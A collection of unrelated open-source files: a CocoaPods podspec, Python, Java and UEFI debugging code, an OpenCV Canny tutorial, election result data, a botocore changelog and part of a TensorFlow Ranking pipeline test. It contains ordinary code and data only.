"name": "HJ_MLeaksFinder",
"version": "1.0.0",
"summary": "Find memory leaks in your iOS app at develop time.",
"homepage": "https://github.com/whhaijun/HJ_MLeaksFinder.git",
"license": "MIT",
"authors": {
"HJ": "<EMAIL>"
},
"source": {
"git": "https://github.com/whhaijun/HJ_MLeaksFinder.git",
"tag": "1.0.0"
},
"platforms": {
"ios": "6.0"
},
"source_files": "MLeaksFinder/**/*"
}
| 203 |
435 | <reponame>amaajemyfren/data
import argparse
from collections import defaultdict
import json
import sys
from tools.utils import get_json_files
def check_ids_unique(data_root, verbose=False):
    """Exit with status 1 if any video JSON files share an ``id``.

    Scans every video JSON file under ``data_root``, groups file paths by
    their ``id`` field (files without an id are ignored), and prints every
    id that appears in more than one file before exiting with status 1.

    Args:
        data_root: Directory to search for JSON files.
        verbose: When truthy, print each file as it is scanned.
    """
    _, video_paths = get_json_files(data_root)
    paths_by_id = defaultdict(list)
    for file_path in video_paths:
        if verbose:
            print('checking', file_path)
        with open(file_path, encoding='UTF-8') as fp:
            blob = json.load(fp)
        id_ = blob.get('id')
        if id_:
            paths_by_id[id_].append(file_path)

    # Keep only ids that occur in more than one file.
    duplicates = {id_: paths for id_, paths in paths_by_id.items()
                  if len(paths) > 1}

    if duplicates:
        print('Duplicate IDs found:')
        for id_, paths in duplicates.items():
            print('ID {}'.format(id_))
            for path in paths:
                print('\t', path)
        sys.exit(1)
def main():
    """Parse command-line options and run the duplicate-id check."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--data-root",
                        help="directory to search for JSON files")
    # NOTE(review): declared as int but described like a flag; invoked as
    # e.g. "-v 1" -- confirm intended usage.
    parser.add_argument("-v", "--verbose",
                        type=int,
                        help="increase output verbosity")
    args = parser.parse_args()
    check_ids_unique(args.data_root, verbose=args.verbose)


if __name__ == '__main__':
    main()
| 620 |
2,757 | <reponame>CEOALT1/RefindPlusUDK
#
# Copyright (c) 2011-2013, ARM Limited. All rights reserved.
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
import os
import struct

import build_report
import firmware_volume
import system_table
# Reload external classes
reload(firmware_volume)
reload(build_report)
reload(system_table)
def readMem32(executionContext, address):
    """Read a little-endian 32-bit unsigned word from target memory.

    Args:
        executionContext: Debugger execution context providing the memory service.
        address: Target address to read.

    Returns:
        The word at ``address`` as an unsigned integer.
    """
    # 4 bytes at 32-bit access width; decode as little-endian uint32.
    # (Renamed local: the original shadowed the builtin 'bytes'.)
    raw = executionContext.getMemoryService().read(address, 4, 32)
    return struct.unpack('<I', raw)[0]
def dump_fv(ec, fv_base, fv_size):
fv = firmware_volume.FirmwareVolume(ec,
int(build.PCDs['gArmTokenSpaceGuid']['PcdFvBaseAddress'][0],16),
int(build.PCDs['gArmTokenSpaceGuid']['PcdFvSize'][0],16))
ffs = fv.get_next_ffs()
while ffs != None:
print "# %s" % ffs
section = ffs.get_next_section()
while section != None:
print "\t%s" % section
try:
print "\t\t- %s" % section.get_debug_filepath()
except Exception:
pass
section = ffs.get_next_section(section)
ffs = fv.get_next_ffs(ffs)
def dump_system_table(ec, mem_base, mem_size):
    # Locate the EFI System Table within [mem_base, mem_base + mem_size),
    # follow its Debug Info configuration table, and dump that table.
    st = system_table.SystemTable(ec, mem_base, mem_size)
    debug_info_table_base = st.get_configuration_table(system_table.DebugInfoTable.CONST_DEBUG_INFO_TABLE_GUID)
    debug_info_table = system_table.DebugInfoTable(ec, debug_info_table_base)
    debug_info_table.dump()
def load_symbol_from_file(ec, filename, address, verbose = False):
    # Register the symbols of 'filename' with the debugger at load address
    # 'address'. If the image was already registered, unload and re-add it.
    if verbose:
        print "Add symbols of %s at 0x%x" % (filename, address)
    try:
        ec.getImageService().addSymbols(filename, address)
    except:
        try:
            # We could get an exception if the symbols are already loaded
            ec.getImageService().unloadSymbols(filename)
            ec.getImageService().addSymbols(filename, address)
        except:
            # Best effort: report and continue rather than abort the session.
            print "Warning: not possible to load symbols from %s at 0x%x" % (filename, address)
def is_aarch64(ec):
    """Return True when the target exposes AArch64 registers.

    Probes the AArch64-only register 'X0'; any failure is taken to mean
    the target is not a 64-bit ARM core.
    """
    try:
        ec.getRegisterService().getValue('X0')
        return True
    except:
        return False
class ArmPlatform:
    """Static description of an ARM platform: system memory plus firmware volumes."""

    def __init__(self, sysmembase=None, sysmemsize=None, fvs=None):
        """
        Args:
            sysmembase: Base address of system memory (None if unknown).
            sysmemsize: Size of system memory in bytes (None if unknown).
            fvs: Collection of (base, size) firmware-volume entries.
        """
        # Fix: avoid the mutable-default-argument pitfall. The previous
        # 'fvs={}' default was a single shared dict aliased by every
        # instance constructed without an explicit 'fvs'.
        if fvs is None:
            fvs = {}
        self.sysmembase = sysmembase
        self.sysmemsize = sysmemsize
        self.fvs = fvs
class ArmPlatformDebugger:
    # Helper that maps the debugger's current PC (or every known module) to
    # debug symbols, using either a build report or a caller-supplied list
    # of memory regions to discover firmware volumes and system memory.

    # Lazily-discovered EFI System Table (shared across instances).
    system_table = None
    # Cache of FirmwareVolume objects keyed by FV base address.
    firmware_volumes = {}

    # Region type tags accepted in the 'regions' constructor argument.
    REGION_TYPE_SYSMEM = 1
    REGION_TYPE_ROM = 2
    REGION_TYPE_FV = 3

    def __init__(self, ec, report_log, regions, verbose = False):
        # ec: debugger execution context; report_log: optional EDK2 build
        # report path; regions: fallback (type, base, size) tuples used when
        # no report is available.
        self.ec = ec
        self.verbose = verbose
        fvs = []
        sysmem_base = None
        sysmem_size = None

        if report_log and os.path.isfile(report_log):
            try:
                self.build = build_report.BuildReport(report_log)
            except IOError:
                raise IOError(2, 'Report \'%s\' is not valid' % report_log)

            # Generate list of supported Firmware Volumes
            if self.build.PCDs['gArmTokenSpaceGuid'].has_key('PcdFvSize') and int(self.build.PCDs['gArmTokenSpaceGuid']['PcdFvSize'][0],16) != 0:
                fvs.append((int(self.build.PCDs['gArmTokenSpaceGuid']['PcdFvBaseAddress'][0],16),int(self.build.PCDs['gArmTokenSpaceGuid']['PcdFvSize'][0],16)))
            if self.build.PCDs['gArmTokenSpaceGuid'].has_key('PcdSecureFvSize') and int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSecureFvSize'][0],16) != 0:
                fvs.append((int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSecureFvBaseAddress'][0],16),int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSecureFvSize'][0],16)))
            if self.build.PCDs['gArmTokenSpaceGuid'].has_key('PcdHypFvSize') and int(self.build.PCDs['gArmTokenSpaceGuid']['PcdHypFvSize'][0],16) != 0:
                fvs.append((int(self.build.PCDs['gArmTokenSpaceGuid']['PcdHypFvBaseAddress'][0],16),int(self.build.PCDs['gArmTokenSpaceGuid']['PcdHypFvSize'][0],16)))

            sysmem_base = int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSystemMemoryBase'][0],16)
            sysmem_size = int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSystemMemorySize'][0],16)
        else:
            for region in regions:
                if region[0] == ArmPlatformDebugger.REGION_TYPE_SYSMEM:
                    sysmem_base = region[1]
                    sysmem_size = region[2]
                elif region[0] == ArmPlatformDebugger.REGION_TYPE_FV:
                    fvs.append((region[1],region[2]))
                elif region[0] == ArmPlatformDebugger.REGION_TYPE_ROM:
                    # Scan the ROM in 4MB strides for a firmware-volume signature.
                    # NOTE(review): 'FirmwareVolume' is unqualified here -- the
                    # class lives in the 'firmware_volume' module, so this branch
                    # would raise NameError as written; confirm intended symbol.
                    for base in xrange(region[1], region[1] + region[2], 0x400000):
                        signature = struct.unpack("cccc", self.ec.getMemoryService().read(base, 4, 32))
                        if signature == FirmwareVolume.CONST_FV_SIGNATURE:
                            fvs.append((base,0))
                else:
                    print "Region type '%d' Not Supported" % region[0]

        self.platform = ArmPlatform(sysmem_base, sysmem_size, fvs)

    def in_sysmem(self, addr):
        # True when 'addr' falls inside the known system-memory window.
        return (self.platform.sysmembase is not None) and (self.platform.sysmembase <= addr) and (addr < self.platform.sysmembase + self.platform.sysmemsize)

    def in_fv(self, addr):
        # True when 'addr' falls inside any known firmware volume.
        return (self.get_fv_at(addr) != None)

    def get_fv_at(self, addr):
        # Return the (base, size) firmware volume containing 'addr', or None.
        for fv in self.platform.fvs:
            if (fv[0] <= addr) and (addr < fv[0] + fv[1]):
                return fv
        return None

    def load_current_symbols(self):
        # Load symbols for the module at the current PC and for every frame
        # on the call stack, from either the XIP firmware volume or the
        # DXE debug-info table, depending on where the PC resides.
        pc = int(self.ec.getRegisterService().getValue('PC')) & 0xFFFFFFFF
        if self.in_fv(pc):
            debug_infos = []

            (fv_base, fv_size) = self.get_fv_at(pc)

            if self.firmware_volumes.has_key(fv_base) == False:
                self.firmware_volumes[fv_base] = firmware_volume.FirmwareVolume(self.ec, fv_base, fv_size)

            stack_frame = self.ec.getTopLevelStackFrame()
            info = self.firmware_volumes[fv_base].load_symbols_at(int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF, self.verbose)
            debug_infos.append(info)
            while stack_frame.next() is not None:
                stack_frame = stack_frame.next()

                # Stack frame attached to 'PC'
                pc = int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF

                # Check if the symbols for this stack frame have already been loaded
                found = False
                for debug_info in debug_infos:
                    if (pc >= debug_info[0]) and (pc < debug_info[0] + debug_info[1]):
                        found = True
                if found == False:
                    info = self.firmware_volumes[fv_base].load_symbols_at(pc)
                    debug_infos.append(info)

            #self.firmware_volumes[fv_base].load_symbols_at(pc)
        elif self.in_sysmem(pc):
            debug_infos = []

            if self.system_table is None:
                # Find the System Table
                self.system_table = system_table.SystemTable(self.ec, self.platform.sysmembase, self.platform.sysmemsize)

                # Find the Debug Info Table
                debug_info_table_base = self.system_table.get_configuration_table(system_table.DebugInfoTable.CONST_DEBUG_INFO_TABLE_GUID)
                self.debug_info_table = system_table.DebugInfoTable(self.ec, debug_info_table_base)

            stack_frame = self.ec.getTopLevelStackFrame()
            info = self.debug_info_table.load_symbols_at(int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF, self.verbose)
            debug_infos.append(info)
            while stack_frame.next() is not None:
                stack_frame = stack_frame.next()

                # Stack frame attached to 'PC'
                pc = int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF

                # Check if the symbols for this stack frame have already been loaded
                found = False
                for debug_info in debug_infos:
                    if (pc >= debug_info[0]) and (pc < debug_info[0] + debug_info[1]):
                        found = True
                if found == False:
                    # A frame may point outside any known module; skip it.
                    try:
                        info = self.debug_info_table.load_symbols_at(pc)
                        debug_infos.append(info)
                    except:
                        pass

            #self.debug_info_table.load_symbols_at(pc)
        else:
            raise Exception('ArmPlatformDebugger', "Not supported region")

    def load_all_symbols(self):
        # Load symbols for every module: XIP modules from each firmware
        # volume, then (best effort) modules loaded into system memory.

        # Load all the XIP symbols attached to the Firmware Volume
        for (fv_base, fv_size) in self.platform.fvs:
            if self.firmware_volumes.has_key(fv_base) == False:
                self.firmware_volumes[fv_base] = firmware_volume.FirmwareVolume(self.ec, fv_base, fv_size)
            self.firmware_volumes[fv_base].load_all_symbols(self.verbose)

        try:
            # Load all symbols of module loaded into System Memory
            if self.system_table is None:
                # Find the System Table
                self.system_table = system_table.SystemTable(self.ec, self.platform.sysmembase, self.platform.sysmemsize)

                # Find the Debug Info Table
                debug_info_table_base = self.system_table.get_configuration_table(system_table.DebugInfoTable.CONST_DEBUG_INFO_TABLE_GUID)
                self.debug_info_table = system_table.DebugInfoTable(self.ec, debug_info_table_base)

            self.debug_info_table.load_all_symbols(self.verbose)
        except:
            # Debugger exception could be excepted if DRAM has not been initialized or if we have not started to run from DRAM yet
            print "Note: no symbols have been found in System Memory (possible cause: the UEFI permanent memory has been installed yet)"
| 5,117 |
879 | package com.bookstore.repository;
import com.bookstore.dto.BookstoreDto;
import com.bookstore.entity.Author;
import java.util.List;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.stereotype.Repository;
import org.springframework.transaction.annotation.Transactional;
@Repository
public interface AuthorRepository extends JpaRepository<Author, Long> {

    /**
     * Projects author name and book title pairs for books at the given price.
     *
     * NOTE(review): the join condition is {@code a.name = b.name}, i.e. it
     * assumes {@code Book.name} stores the author's name — confirm against
     * the {@code Book} entity mapping.
     *
     * @param price exact book price to match
     * @return name/title projections for every matching author-book pair
     */
    // Query all author names and their titles with the given price
    @Transactional(readOnly = true)
    @Query(value = "SELECT a.name AS name, b.title AS title "
        + "FROM Author a INNER JOIN Book b ON a.name = b.name "
        + "WHERE b.price = ?1")
    List<BookstoreDto> fetchAuthorNameBookTitleWithPrice(int price);
}
| 282 |
402 |
import tensorflow as tf
import numpy as np
import os
import urllib.request as urlopen
from io import BytesIO
from PIL import Image
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.ticker as ticker
class Model:
    # TF1 object-detection wrapper: loads a frozen inference graph and runs
    # detection on PIL images, returning / drawing bounding boxes.

    def __init__(self, checkpoint):
        """Load a frozen TensorFlow graph from 'checkpoint' (a .pb file)."""
        # Detections below this score are discarded by generate_image_detections.
        self.confidenceThreshold = 0.9
        print('Creating Graph...')
        self.detection_graph = tf.Graph()
        with self.detection_graph.as_default():
            od_graph_def = tf.GraphDef()
            with tf.gfile.GFile(checkpoint, 'rb') as fid:
                serialized_graph = fid.read()
                od_graph_def.ParseFromString(serialized_graph)
                tf.import_graph_def(od_graph_def, name='')
        print('...done')

    def generate_image_detections(self, image):
        """Run the detector on a PIL image.

        Returns a list of dicts with pixel-space 'x', 'y', 'w', 'h' plus
        stringified 'score' and 'class' for detections above the confidence
        threshold. On failure, returns the exception message as a string.
        """
        with self.detection_graph.as_default():
            with tf.Session(graph=self.detection_graph) as sess:
                # img_file = BytesIO(urlopen.urlopen(url).read())
                # image = Image.open(img_file).convert('RGB')
                print('image shape', image.size)
                # image = mpimg.imread(url)
                # The graph expects a batch dimension: (1, H, W, C).
                imageNP_expanded = np.expand_dims(image, axis=0)
                image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
                box = self.detection_graph.get_tensor_by_name('detection_boxes:0')
                score = self.detection_graph.get_tensor_by_name('detection_scores:0')
                clss = self.detection_graph.get_tensor_by_name('detection_classes:0')
                num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')

                rbboxes = []
                # Actual detection
                try:
                    (obox, oscore, oclss, num_detections) = sess.run(
                        [box, score, clss, num_detections],
                        feed_dict={image_tensor: imageNP_expanded})
                    # Drop the batch dimension.
                    bboxes, scores, classes = obox[0], oscore[0], oclss[0]

                    #calculate the size
                    iBox = 0;
                    box = bboxes[iBox]

                    dpi = 100
                    s = image.size
                    imageHeight = s[1]
                    imageWidth = s[0]

                    for iBox,box in enumerate(bboxes):
                        iScore = scores[iBox]
                        if iScore < self.confidenceThreshold:
                            continue

                        # Boxes come back as relative [top, left, bottom, right];
                        # convert to absolute pixel x/y/width/height.
                        topRel = box[0]
                        leftRel = box[1]
                        bottomRel = box[2]
                        rightRel = box[3]

                        x = leftRel * imageWidth
                        y = topRel * imageHeight
                        w = (rightRel-leftRel) * imageWidth
                        h = (bottomRel-topRel) * imageHeight

                        rbboxes.append({
                            'x': x,
                            'y': y,
                            'w': w,
                            'h': h,
                            'score': str(iScore),
                            'class': str(classes[iBox])
                        })
                except Exception as e:
                    # NOTE(review): errors are returned as a string instead of
                    # raised -- callers must type-check the result.
                    rbboxes = str(e)

        return rbboxes

    def draw_bounding_box(self, bboxes, image, outputFileName, confidenceThreshold=0.9):
        """Render 'bboxes' over 'image' and save to 'outputFileName'.

        Only boxes with score >= confidenceThreshold are drawn.
        Returns the number of boxes drawn.
        """
        number_of_det = 0
        # img_file = BytesIO(urlopen.urlopen(inputFileName).read())
        # image = Image.open(img_file).convert('RGB')
        s = image.size;
        imageHeight = s[1];
        imageWidth = s[0]
        # Size the figure so one figure pixel maps to one image pixel.
        dpi = 100
        figsize = imageWidth / float(dpi), imageHeight / float(dpi)

        fig = plt.figure(figsize=figsize)
        ax = plt.axes([0,0,1,1])
        ax.imshow(image)
        ax.set_axis_off()

        for iBox,box in enumerate(bboxes):
            score = float(box.get('score'))
            if score < confidenceThreshold:
                continue
            iLeft = box.get('x')
            iBottom = box.get('y')
            w = box.get('w')
            h = box.get('h')
            rect = patches.Rectangle((iLeft,iBottom),w,h,linewidth=4,edgecolor='r',facecolor='none')

            # Add the patch to the Axes
            ax.add_patch(rect)
            number_of_det += 1

        # Strip all margins/ticks so the saved file is exactly the image.
        plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0, hspace = 0, wspace = 0)
        plt.margins(0,0)
        ax.xaxis.set_major_locator(ticker.NullLocator())
        ax.yaxis.set_major_locator(ticker.NullLocator())
        ax.axis('tight')
        ax.set(xlim=[0,imageWidth],ylim=[imageHeight,0],aspect=1)
        plt.axis('off')

        # plt.savefig(outputFileName, bbox_inches='tight', pad_inches=0.0, dpi=dpi, transparent=True)
        plt.savefig(outputFileName, dpi=dpi, transparent=True)
        return number_of_det
# Model configuration: load the frozen detector once at import time.
checkpoint = 'checkpoint/frozen_inference_graph.pb'
model = Model(checkpoint)
| 2,959 |
390 | <reponame>kevind-wgu/tinylog
/*
* Copyright 2019 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*/
package org.tinylog.throwable;
import java.util.List;
/**
 * Immutable storage for throwable data.
 */
public final class ThrowableStore implements ThrowableData {

	// Fields are final to enforce the documented immutability guarantee
	// (the class exposes no setters, so this is purely a hardening change).
	private final String className;
	private final String message;
	private final List<StackTraceElement> stackTrace;
	private final ThrowableData cause;

	/**
	 * @param className
	 *            Class name of the throwable
	 * @param message
	 *            Message of the throwable
	 * @param stackTrace
	 *            Stack trace for the throwable
	 * @param cause
	 *            Cause of the throwable (can be {@code null})
	 */
	public ThrowableStore(final String className, final String message, final List<StackTraceElement> stackTrace,
		final ThrowableData cause) {
		this.className = className;
		this.message = message;
		this.stackTrace = stackTrace;
		this.cause = cause;
	}

	@Override
	public String getClassName() {
		return className;
	}

	@Override
	public String getMessage() {
		return message;
	}

	@Override
	public List<StackTraceElement> getStackTrace() {
		return stackTrace;
	}

	@Override
	public ThrowableData getCause() {
		return cause;
	}

}
| 544 |
348 | <reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Isle","circ":"3ème circonscription","dpt":"Haute-Vienne","inscrits":6266,"abs":2942,"votants":3324,"blancs":307,"nuls":165,"exp":2852,"res":[{"nuance":"REM","nom":"<NAME>","voix":2020},{"nuance":"LR","nom":"M. <NAME>","voix":832}]} | 116 |
2,875 | <reponame>makelove/OpenCV-Python-Tutorial
# -*- coding: utf-8 -*-
'''
Canny edge detection is a popular multi-stage edge detection algorithm
proposed by John F. Canny in 1986.

1. Noise reduction: edge detection is sensitive to noise, so the image is
   first smoothed with a 5x5 Gaussian filter.
2. Gradient computation: the Sobel operator is applied to the smoothed image
   to obtain the first derivatives in the horizontal and vertical
   directions (image gradients Gx and Gy).
   The gradient direction is always perpendicular to the edge and is
   quantized into four classes: vertical, horizontal, and the two diagonals.
3. Non-maximum suppression.
4. Hysteresis thresholding: two thresholds, minVal and maxVal, decide which
   candidate edges are real. Pixels with gradient magnitude above maxVal are
   definite edges; those below minVal are discarded. Pixels in between are
   kept only if they are connected to a definite edge pixel.

Canny edge detection in OpenCV:
A single function, cv2.Canny(), performs all of the steps above.
  - The first argument is the input image.
  - The second and third arguments are minVal and maxVal.
  - The fourth argument sets the aperture size of the Sobel kernel used to
    compute image gradients (default 3).
  - The last argument, L2gradient, selects the gradient-magnitude formula.
    If True, the accurate L2 norm is used; otherwise the approximation
    Edge_Gradient(G) = |Gx| + |Gy| is used (default False).
'''
import cv2
import numpy as np
from matplotlib import pyplot as plt

# Load the sample image as grayscale (flag 0) and run Canny with
# minVal=100, maxVal=200.
img = cv2.imread('../data/messi5.jpg',0)
edges = cv2.Canny(img, 100, 200)
cv2.imshow('Edges',edges)
cv2.waitKey(0)

# Alternative: show original and edge images side by side with matplotlib.
# plt.subplot(121), plt.imshow(img, cmap='gray')
# plt.title('Original Image'), plt.xticks([]), plt.yticks([])
# plt.subplot(122), plt.imshow(edges, cmap='gray')
# plt.title('Edge Image'), plt.xticks([]), plt.yticks([])
# plt.show()
| 1,146 |
7,510 | <filename>.changes/1.16.41.json
[
{
"category": "``config``",
"description": "[``botocore``] Update config client to latest version",
"type": "api-change"
},
{
"category": "``ec2``",
"description": "[``botocore``] Update ec2 client to latest version",
"type": "api-change"
},
{
"category": "``glue``",
"description": "[``botocore``] Update glue client to latest version",
"type": "api-change"
},
{
"category": "``batch``",
"description": "[``botocore``] Update batch client to latest version",
"type": "api-change"
},
{
"category": "``managedblockchain``",
"description": "[``botocore``] Update managedblockchain client to latest version",
"type": "api-change"
},
{
"category": "``service-quotas``",
"description": "[``botocore``] Update service-quotas client to latest version",
"type": "api-change"
},
{
"category": "``s3``",
"description": "[``botocore``] Update s3 client to latest version",
"type": "api-change"
},
{
"category": "``connectparticipant``",
"description": "[``botocore``] Update connectparticipant client to latest version",
"type": "api-change"
},
{
"category": "``securityhub``",
"description": "[``botocore``] Update securityhub client to latest version",
"type": "api-change"
},
{
"category": "``qldb-session``",
"description": "[``botocore``] Update qldb-session client to latest version",
"type": "api-change"
},
{
"category": "``outposts``",
"description": "[``botocore``] Update outposts client to latest version",
"type": "api-change"
},
{
"category": "``servicecatalog-appregistry``",
"description": "[``botocore``] Update servicecatalog-appregistry client to latest version",
"type": "api-change"
},
{
"category": "``dms``",
"description": "[``botocore``] Update dms client to latest version",
"type": "api-change"
},
{
"category": "``apigateway``",
"description": "[``botocore``] Update apigateway client to latest version",
"type": "api-change"
}
] | 822 |
879 | <filename>sdk/src/main/java/org/zstack/sdk/GetEcsInstanceVncUrlResult.java
package org.zstack.sdk;

/**
 * Result payload for the "get ECS instance VNC URL" SDK call.
 */
public class GetEcsInstanceVncUrlResult {
    // Identifier of the ECS instance the VNC URL was requested for.
    public java.lang.String ecsId;
    public void setEcsId(java.lang.String ecsId) {
        this.ecsId = ecsId;
    }
    public java.lang.String getEcsId() {
        return this.ecsId;
    }

    // URL of the instance's VNC console.
    public java.lang.String vncUrl;
    public void setVncUrl(java.lang.String vncUrl) {
        this.vncUrl = vncUrl;
    }
    public java.lang.String getVncUrl() {
        return this.vncUrl;
    }

}
| 246 |
4,041 | /*
* Copyright 2019 Web3 Labs Ltd.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*/
package org.web3j.protocol.core.methods.response.admin;
import java.io.IOException;
import java.util.List;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.core.JsonToken;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.DeserializationContext;
import com.fasterxml.jackson.databind.JsonDeserializer;
import com.fasterxml.jackson.databind.ObjectReader;
import com.fasterxml.jackson.databind.annotation.JsonDeserialize;
import org.web3j.protocol.ObjectMapperFactory;
import org.web3j.protocol.core.Response;
/** admin_peers. */
public class AdminPeers extends Response<List<AdminPeers.Peer>> {
@JsonIgnoreProperties(ignoreUnknown = true)
@Override
@JsonDeserialize(using = AdminPeers.ResponseDeserialiser.class)
public void setResult(List<Peer> result) {
super.setResult(result);
}
public static class Peer {
public Peer() {}
public Peer(String id, String name, String enode, PeerNetwork network) {
this.id = id;
this.name = name;
this.network = network;
this.enode = enode;
}
public String getId() {
return id;
}
public String getName() {
return name;
}
public String getEnode() {
return enode;
}
private String id;
private String name;
private PeerNetwork network;
private String enode;
public PeerNetwork getNetwork() {
return network;
}
}
public static class PeerNetwork {
public PeerNetwork() {}
private String localAddress;
private String remoteAddress;
public PeerNetwork(String localAddress, String remoteAddress) {
this.localAddress = localAddress;
this.remoteAddress = remoteAddress;
}
public String getLocalAddress() {
return localAddress;
}
public String getRemoteAddress() {
return remoteAddress;
}
}
public static class ResponseDeserialiser extends JsonDeserializer<List<Peer>> {
private ObjectReader objectReader = ObjectMapperFactory.getObjectReader();
@Override
public List<Peer> deserialize(
JsonParser jsonParser, DeserializationContext deserializationContext)
throws IOException {
if (jsonParser.getCurrentToken() != JsonToken.VALUE_NULL) {
return objectReader.readValue(jsonParser, new TypeReference<List<Peer>>() {});
} else {
return null; // null is wrapped by Optional in above getter
}
}
}
}
| 1,296 |
1,968 | //////////////////////////////////////////////////////////////////////////////
//
// This file is part of the Corona game engine.
// For overview and more information on licensing please refer to README.md
// Home page: https://github.com/coronalabs/corona
// Contact: <EMAIL>
//
//////////////////////////////////////////////////////////////////////////////
#ifndef _Rtt_VideoSource_H__
#define _Rtt_VideoSource_H__
#include "Renderer/Rtt_Texture.h"
// ----------------------------------------------------------------------------
namespace Rtt
{
// ----------------------------------------------------------------------------
// Identifies the capture source video frames are taken from.
typedef enum _Source
{
	kCamera,       // Default device camera.
	kCameraFront,  // Front-facing camera.
	// kFile ???
}
VideoSource;
// ----------------------------------------------------------------------------
} // namespace Rtt
// ----------------------------------------------------------------------------
#endif // _Rtt_VideoSource_H__
| 195 |
2,482 | # Copyright 2021 The TensorFlow Ranking Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for pipeline.py."""
import os
from typing import Dict
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_ranking.python.keras import model as model_lib
from tensorflow_ranking.python.keras import pipeline
from google.protobuf import text_format
from tensorflow_serving.apis import input_pb2
# Name of the synthetic mask feature passed to the model builder.
_MASK = "__list_mask__"
# Per-example feature used as the ranking label.
_LABEL_FEATURE = "utility"
# Label default used for padded examples (see the label feature spec below).
_PADDING_LABEL = -1
ELWC = text_format.Parse(
"""
context {
features {
feature {
key: "cf_1"
value { float_list { value: 1.0 } }
}
}
}
examples {
features {
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_2"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 0.0 } }
}
}
}
examples {
features {
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_3"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 1.0 } }
}
}
}
""", input_pb2.ExampleListWithContext())
EXAMPLE_PROTO_1 = text_format.Parse(
"""
features {
feature {
key: "cf_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_2"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 0.0 } }
}
}
""", tf.train.Example())
EXAMPLE_PROTO_2 = text_format.Parse(
"""
features {
feature {
key: "cf_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_3"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 1.0 } }
}
}
""", tf.train.Example())
class DummyMultiTaskScorer(model_lib.UnivariateScorer):
  """Univariate scorer producing two independent dense scores per example.

  Used to exercise multi-task pipelines: each task head is a fresh Dense(1)
  layer applied to an arbitrary example feature; context features are ignored.
  """

  def _score_flattened(
      self,
      context_features: Dict[str, tf.Tensor],
      example_features: Dict[str, tf.Tensor],
  ) -> Dict[str, tf.Tensor]:
    # Score from whichever example feature iterates first.
    f = next(iter(example_features.values()))
    return {
        "task1": tf.keras.layers.Dense(1)(f),
        "task2": tf.keras.layers.Dense(1)(f),
    }
class PipelineTest(tf.test.TestCase, parameterized.TestCase):
  """End-to-end tests: train a pipeline, export it, and probe its signatures."""

  @parameterized.named_parameters(
      ("Local", None), ("Mirrored", "MirroredStrategy"),
      ("MultiWorker", "MultiWorkerMirroredStrategy"))
  def test_pipeline_with_feature_specs(self, strategy):
    """Trains a SimplePipeline and validates the exported SavedModel.

    Args:
      strategy: Name of the `tf.distribute` strategy to train under, or None
        for the default (no distribution) strategy.
    """
    # Build a small training/validation TFRecord of identical ELWC protos.
    data_dir = self.create_tempdir()
    data_file = os.path.join(data_dir, "elwc.tfrecord")
    if tf.io.gfile.exists(data_file):
      tf.io.gfile.remove(data_file)
    with tf.io.TFRecordWriter(data_file) as writer:
      for _ in range(256):
        writer.write(ELWC.SerializeToString())
    model_dir = os.path.join(data_dir, "model")
    # Same file is reused for train and validation; this test only checks
    # that the pipeline runs and exports, not model quality.
